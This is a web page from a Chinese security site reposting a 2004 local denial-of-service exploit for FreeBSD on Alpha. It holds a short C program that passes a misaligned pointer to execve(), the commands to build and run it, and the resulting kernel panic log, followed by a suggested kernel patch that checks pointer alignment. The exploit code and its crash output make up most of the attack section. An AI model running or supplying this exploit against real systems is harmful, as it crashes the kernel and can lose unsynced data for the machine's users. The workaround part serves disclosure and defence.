首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD Local DoS Exploit
来源:www.marcetam.net 作者:Marceta 发布时间:2004-07-02  

FreeBSD Local DoS Exploit


/*
* FreeBSD/Alpha local DoS
* by Marceta Milos
* root@marcetam.net
*
*/

char main()
{
execve("/bin/ls",(int *)(main + 1), 0);
}

/* eof */

# gcc kernkill.c -o kk
#./kk

<I>fatal kernel trap:

trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720

pid = 713, comm = kk

panic: trap
cpuid = 0;

syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231
231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...

Workaround:
You may make a proper use of ALIGNED_POINTER macro which already exists in
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your
own like:

#define PTR_ALIGNED(x) (((x) & 0x7) == 0)

Putting the following line at the top of execve() in
src/sys/kern/kern_exec.c should prevent the crash (unfortunately, this is
not tested. Idea is Marceta Milos', a little corrected by Mr. Dag-Erling
Sm rgrav, FreeBSD deputy security officer):

if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
return (EFAULT);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpMyAdmin PHP Code Injection
·Microsoft IE Remote Applicatio
·MPlayer GUI filename handling
·MySQL Authentication Bypass Ex
·Windows XP UPNP exploit
·Microsoft IE Remote Wscript.Sh
·Rlpr <=2.04 msg() Remote fo
·Win2k Utility Manager Privileg
·PoC poisoning cache attack SEF
·MPlayer buffer overflow for UN
·Remote D.O.S WinAgents TFTP Se
·Win2k Universal language Utili
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved